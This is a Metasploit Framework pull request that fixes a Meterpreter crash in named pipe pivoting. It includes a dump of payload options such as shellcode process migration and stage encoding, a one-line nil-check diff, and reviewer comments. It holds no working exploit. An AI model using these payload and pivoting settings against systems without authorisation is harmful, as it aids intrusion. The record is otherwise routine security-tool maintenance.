"StageEncoderSaveRegisters"=>#<Msf::OptString:0x000055784a611288 @name="StageEncoderSaveRegisters", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Additional registers to preserve in the staged payload if EnableStageEncoding is set", @default="", @enums=[], @owner=Msf::Payload::Stager>, "StageEncodingFallback"=>#<Msf::OptBool:0x000055784a5f6438 @name="StageEncodingFallback", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Fallback to no encoding if the selected StageEncoder is not compatible", @default=true, @enums=[], @owner=Msf::Payload::Stager>, "PrependMigrate"=>#<Msf::OptBool:0x000055784a4afc50 @name="PrependMigrate", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Spawns and runs shellcode in new process", @default=false, @enums=[], @owner=Msf::Payload::Windows>, "PrependMigrateProc"=>#<Msf::OptString:0x000055784a392368 @name="PrependMigrateProc", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Process to spawn and run shellcode in", @default=nil, @enums=[], @owner=Msf::Payload::Windows>, "EXITFUNC"=>#<Msf::OptEnum:0x000055784b64fd20 @name="EXITFUNC", @advanced=false, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc_string="Exit technique", @enums=["''", "seh", "thread", "process", "none"], @default="process", @owner=Msf::Payload::Windows>}, @datastore={"WORKSPACE"=>nil, "VERBOSE"=>false, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "PrependMigrateProc"=>nil, "EXITFUNC"=>"process"}, @privileged=false, @license="Metasploit Framework License (BSD)", @staged=false>
```

### PR DESCRIPTION
**Pull request by adfoster-r7**
closes https://github.com/rapid7/metasploit-framework/issues/16641
closes https://github.com/rapid7/metasploit-framework/issues/16646

## Verification

Repeat the replication steps as noted within https://github.com/rapid7/metasploit-framework/issues/16641#issue-1258477845

### CODE REVIEW

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb [hunk 1]
```diff
@@ -1337,13 +1337,14 @@ def cmd_load(*args)
         if (client.core.use(modulenameprovided) == true)
           add_extension_client(md)
 
-          if md == 'stdapi' && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo']
+          if md == 'stdapi' && (client.exploit_datastore && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo'])
```
Comment (adfoster-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1340]: This was previously crashing as `client.exploit_datastore` was nil. I believe there's missing functionality here, but that's not a blocker for now

**Comment by bwatters-r7** [comment]
One thing I noticed when I was testing this PR is that when you end the pivoted session, it takes down the middle session as well.  I think this should get landed, but I'll create an issue for the crashing middle session separately.

**Comment by bwatters-r7** [comment]
# Release Notes:
This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.
